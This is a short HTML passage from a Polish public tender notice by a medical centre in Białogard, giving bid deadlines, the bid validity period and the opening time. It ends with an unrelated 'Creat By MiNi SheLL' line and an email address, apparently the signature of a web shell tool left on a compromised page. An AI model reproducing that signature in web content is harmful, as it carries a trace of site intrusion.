<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2015 godzina 12:00, miejsce: Regionalne Centrum Medyczne w Białogardzie Sp. z o.o. ul. Chopina 29, 78-200 Białogard, IIIp. - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert odbędzie się w dniu 28.08.2015 r., o godz. 12:30 w Regionalnym Centrum Medycznym w Białogardzie Sp. z o.o., pok. nr 305.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com